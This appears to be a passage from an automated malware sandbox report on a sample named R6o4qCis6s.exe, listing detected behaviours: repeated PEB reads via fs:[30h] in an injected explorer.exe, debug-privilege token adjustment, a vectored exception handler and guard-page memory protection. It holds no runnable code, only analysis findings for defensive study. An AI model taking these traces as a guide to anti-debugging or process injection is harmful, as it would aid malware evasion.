Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0484DBE9 mov eax, dword ptr fs:[00000030h] 5_2_0484DBE9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048637F5 mov eax, dword ptr fs:[00000030h] 5_2_048637F5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F070D mov eax, dword ptr fs:[00000030h] 5_2_048F070D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F070D mov eax, dword ptr fs:[00000030h] 5_2_048F070D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485A70E mov eax, dword ptr fs:[00000030h] 5_2_0485A70E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485A70E mov eax, dword ptr fs:[00000030h] 5_2_0485A70E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0484F716 mov eax, dword ptr fs:[00000030h] 5_2_0484F716
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E131B mov eax, dword ptr fs:[00000030h] 5_2_048E131B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048BFF10 mov eax, dword ptr fs:[00000030h] 5_2_048BFF10
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048BFF10 mov eax, dword ptr fs:[00000030h] 5_2_048BFF10
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04824F2E mov eax, dword ptr fs:[00000030h] 5_2_04824F2E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04824F2E mov eax, dword ptr fs:[00000030h] 5_2_04824F2E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485E730 mov eax, dword ptr fs:[00000030h] 5_2_0485E730
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482DB40 mov eax, dword ptr fs:[00000030h] 5_2_0482DB40
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483EF40 mov eax, dword ptr fs:[00000030h] 5_2_0483EF40
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F8B58 mov eax, dword ptr fs:[00000030h] 5_2_048F8B58
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482F358 mov eax, dword ptr fs:[00000030h] 5_2_0482F358
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482DB60 mov ecx, dword ptr fs:[00000030h] 5_2_0482DB60
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483FF60 mov eax, dword ptr fs:[00000030h] 5_2_0483FF60
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F8F6A mov eax, dword ptr fs:[00000030h] 5_2_048F8F6A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04853B7A mov eax, dword ptr fs:[00000030h] 5_2_04853B7A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04853B7A mov eax, dword ptr fs:[00000030h] 5_2_04853B7A
Enables debug privileges
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\explorer.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00481F2C KiUserExceptionDispatcher,IntersectClipRect,GetSystemMetrics,GetSystemMetrics,ExitProcess,IntersectClipRect,RtlAddVectoredExceptionHandler,IntersectClipRect, 0_2_00481F2C
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Memory protected: page read and write | page guard